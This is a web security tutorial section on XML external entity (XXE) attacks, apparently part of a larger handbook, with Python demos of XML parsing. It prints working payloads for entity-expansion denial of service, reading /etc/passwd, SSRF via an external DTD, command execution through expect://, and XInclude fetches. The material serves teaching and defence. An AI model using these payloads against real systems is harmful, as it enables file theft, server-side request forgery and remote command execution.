4.10. XXE

4.10.1. XML Basics

XML (eXtensible Markup Language) is a markup language for giving electronic documents a structure, and is designed for storing and transmitting data. An XML document consists of an XML declaration, an optional DTD (Document Type Definition), and the document elements. XML is widely used for configuration files (Spring, Struts2, etc.), document description formats (RSS, etc.), and image formats (SVG). The permitted structure of a document, that is, which elements, attributes, and entities it may contain, can be constrained by a DTD.

4.10.2. Basic syntax

An XML document may begin with an XML declaration such as <?xml version="1.0" encoding="UTF-8" standalone="yes"?>, which is part of the XML prolog and declares the version and encoding of the document. The declaration is optional in XML 1.0, but if present it must be the very first thing in the document.
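As a rough illustration of how the declaration and the other parts of a document surface after parsing, the following Python sketch uses the standard-library xml.dom.minidom module. The sample document and the describe helper are made up for this example and are not part of the original text.

```python
from xml.dom import minidom

# Hypothetical sample: declaration, optional DTD, then the document element.
SAMPLE = b"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE note [
<!ELEMENT note ANY>
]>
<note>hello</note>"""


def describe(xml_bytes):
    """Return the declaration fields, the DTD name, and the root element name."""
    doc = minidom.parseString(xml_bytes)
    return {
        "version": doc.version,        # None when there is no declaration
        "encoding": doc.encoding,
        "standalone": doc.standalone,
        "doctype": doc.doctype.name if doc.doctype else None,
        "root": doc.documentElement.tagName,
    }


if __name__ == "__main__":
    print(describe(SAMPLE))
    print(describe(b"<note>no declaration, no DTD</note>"))
```

The second call shows that a document without a declaration or a DTD still parses, since both parts are optional.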

Beyond the optional declaration, XML syntax has the following main rules:

  • All XML elements must have closing tags

  • XML tags are case sensitive

  • XML elements must be properly nested

  • XML documents must have exactly one root element

  • XML attribute values must be quoted
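The rules above can be checked with any conforming parser. The sketch below is one possible way to do so with Python's standard-library xml.etree.ElementTree; the is_well_formed helper and the sample inputs are hypothetical and chosen only to trigger one rule each.

```python
import xml.etree.ElementTree as ET


def is_well_formed(text):
    """Return True if the standard-library parser accepts the document."""
    try:
        ET.fromstring(text)
        return True
    except ET.ParseError:
        return False


# Hypothetical inputs: one valid document, then one violation per rule.
CASES = {
    "valid": '<root><item id="1">x</item></root>',
    "missing closing tag": "<root><item>x</root>",
    "case mismatch": "<root><Item>x</item></root>",
    "bad nesting": "<root><a><b>x</a></b></root>",
    "two roots": "<root/><other/>",
    "unquoted attribute": "<root><item id=1>x</item></root>",
}

if __name__ == "__main__":
    for name, doc in CASES.items():
        print(f"{name}: {is_well_formed(doc)}")
```

Only the first case is accepted; each of the others breaks exactly one of the listed rules.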

XML also provides CDATA sections, written <![CDATA[ ... ]]>, for text that contains many characters that would otherwise need to be escaped.
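To make the effect of CDATA concrete, here is a small Python sketch (standard library only) that compares a CDATA section with the equivalent escaped text. The element name and the sample text are invented for the illustration.

```python
import xml.etree.ElementTree as ET

# The same text written twice: once in a CDATA section, once with escapes.
WITH_CDATA = "<code><![CDATA[if (a < b && b > c) { run(); }]]></code>"
ESCAPED = "<code>if (a &lt; b &amp;&amp; b &gt; c) { run(); }</code>"


def text_of(document):
    """Parse the document and return the text of its root element."""
    return ET.fromstring(document).text


if __name__ == "__main__":
    print(text_of(WITH_CDATA))
    print(text_of(WITH_CDATA) == text_of(ESCAPED))
```

Both forms yield the same character data after parsing; CDATA only changes how the text is written in the source document.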

4.10.3. XXE

When a parser is allowed to resolve external entities, an attacker can craft malicious XML that reads arbitrary files, probes intranet ports, attacks intranet websites, and, in some environments, executes system commands. A plain XXE attack can read server-side files only if the server echoes the parsed content or returns detailed error messages; when it does neither, the data can still be exfiltrated through Blind XXE, which uses out-of-band requests.
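Whether external entities are resolved is a property of the parser and its configuration. As a hedged illustration, the sketch below feeds a typical XXE document to Python's xml.etree.ElementTree, which is documented as not expanding external entities and raising ParseError when one is referenced. The try_parse helper is hypothetical, and other parsers or languages may behave differently.

```python
import xml.etree.ElementTree as ET

# A document that declares and references an external entity.
PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>"""


def try_parse(xml_text):
    """Return ("parsed", root text) or ("rejected", parser error message)."""
    try:
        return ("parsed", ET.fromstring(xml_text).text)
    except ET.ParseError as exc:
        return ("rejected", str(exc))


if __name__ == "__main__":
    status, detail = try_parse(PAYLOAD)
    # The file is never opened; the parser refuses the entity reference.
    print(status, detail)
```

A parser that reported "parsed" together with the file's contents here would be the vulnerable case described above.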

4.10.4. Attack Methods

4.10.4.1. Denial of Service Attacks

<!DOCTYPE data [
<!ELEMENT data ANY>
<!ENTITY a0 "dos" >
<!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;">
<!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;">
]>
<data>&a2;</data>

If parsing is noticeably slow, the test has succeeded and the target may be vulnerable to denial of service. A real attack can add more levels of nested entities, so that the expanded size grows exponentially, or reference very large external entities to the same effect.
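The growth behind this attack is easy to quantify. The following Python sketch generates documents in the style of the payload above and computes how large the expanded text becomes; the function names and the default fan-out of five are assumptions made for the illustration. Keep the level count small when actually parsing.

```python
import xml.etree.ElementTree as ET


def build_nested_entities(levels, fanout=5, seed="dos"):
    """Build a document where each entity repeats the previous one `fanout` times."""
    lines = ["<!DOCTYPE data [", "<!ELEMENT data ANY>", f'<!ENTITY a0 "{seed}">']
    for i in range(1, levels + 1):
        refs = f"&a{i - 1};" * fanout
        lines.append(f'<!ENTITY a{i} "{refs}">')
    lines += ["]>", f"<data>&a{levels};</data>"]
    return "\n".join(lines)


def expanded_length(levels, fanout=5, seed="dos"):
    """Size of the fully expanded text: len(seed) * fanout ** levels."""
    return len(seed) * fanout ** levels


if __name__ == "__main__":
    payload = build_nested_entities(2)
    root = ET.fromstring(payload)  # internal entities are expanded by the parser
    print(len(payload), len(root.text), expanded_length(2))
    # Only computed, not parsed: the size that ten levels would expand to.
    print(expanded_length(10))
```

With two levels the three-character seed expands to 75 characters; every extra level multiplies the result by the fan-out while adding only one short line to the document.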

4.10.4.2. File reading

<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>
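One way to inspect such a document without resolving anything is to let expat report the entity declarations. The Python sketch below is a minimal example under that assumption; list_external_entities is a hypothetical helper, and because no external entity handler is installed, nothing is read from disk or the network.

```python
import xml.parsers.expat
from urllib.parse import urlsplit

PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE data [
<!ELEMENT data ANY>
<!ENTITY file SYSTEM "file:///etc/passwd">
]>
<data>&file;</data>"""


def list_external_entities(xml_text):
    """Return (name, system identifier, scheme) for each external entity declared."""
    found = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry a value; external ones carry a system identifier.
        if system_id is not None:
            found.append((name, system_id, urlsplit(system_id).scheme))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return found


if __name__ == "__main__":
    for entry in list_external_entities(PAYLOAD):
        print(entry)
```

The scheme column makes it easy to see which resource type (file, http, and so on) a vulnerable parser would be asked to load.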

4.10.4.3. SSRF

<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/" [
<!ELEMENT data ANY>
]>
<data>4</data>
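In this payload the request is triggered by the external DTD named in the DOCTYPE rather than by an entity. As a sketch, the Python code below extracts that target with expat's doctype callback and does not fetch it; external_dtd_target is a hypothetical helper name.

```python
import xml.parsers.expat
from urllib.parse import urlsplit

PAYLOAD = """<?xml version="1.0"?>
<!DOCTYPE data SYSTEM "http://publicServer.com/" [
<!ELEMENT data ANY>
]>
<data>4</data>"""


def external_dtd_target(xml_text):
    """Return (scheme, host) of the external DTD in the DOCTYPE, or None."""
    seen = {}

    def on_doctype(name, system_id, public_id, has_internal_subset):
        seen["system_id"] = system_id

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_text, True)

    system_id = seen.get("system_id")
    if not system_id:
        return None
    parts = urlsplit(system_id)
    # urlsplit lower-cases the host name.
    return parts.scheme, parts.hostname


if __name__ == "__main__":
    print(external_dtd_target(PAYLOAD))
```

A parser that loads external DTDs would send a request to that host from the server's network position, which is what makes the payload usable for SSRF.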

4.10.4.4. RCE

<?xml version="1.0"?>
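<!DOCTYPE catalog [
<!ELEMENT catalog ANY>
<!-- expect:// is a PHP stream wrapper; it works only when the PHP expect extension is loaded -->
<!ENTITY xxe SYSTEM "expect://id">
]>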
<catalog>
   <core id="test101">
      <description>&xxe;</description>
   </core>
</catalog>

4.10.4.5. XInclude

<?xml version='1.0'?>
<data xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="http://publicServer.com/file.xml"></xi:include>
</data>
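To show what an XInclude-aware processor does with such a document, the sketch below uses Python's standard-library xml.etree.ElementInclude with a custom loader that records the requested href instead of fetching it. The loader, the stand-in "included" element, and the helper name are assumptions made for the example.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

DOC = """<?xml version='1.0'?>
<data xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="http://publicServer.com/file.xml"></xi:include>
</data>"""


def expand_with_recording_loader(xml_text):
    """Process xi:include elements, recording each href instead of fetching it."""
    requested = []

    def loader(href, parse, encoding=None):
        requested.append(href)
        # Stand-in for the fetched document; a real loader would read href.
        return ET.Element("included", {"from": href})

    root = ET.fromstring(xml_text)
    ElementInclude.include(root, loader=loader)
    return root, requested


if __name__ == "__main__":
    root, requested = expand_with_recording_loader(DOC)
    print(requested)
    print(ET.tostring(root, encoding="unicode"))
```

The xi:include element is replaced by whatever the loader returns, so a processor with a network-capable loader would fetch the attacker-chosen URL and splice the result into the document.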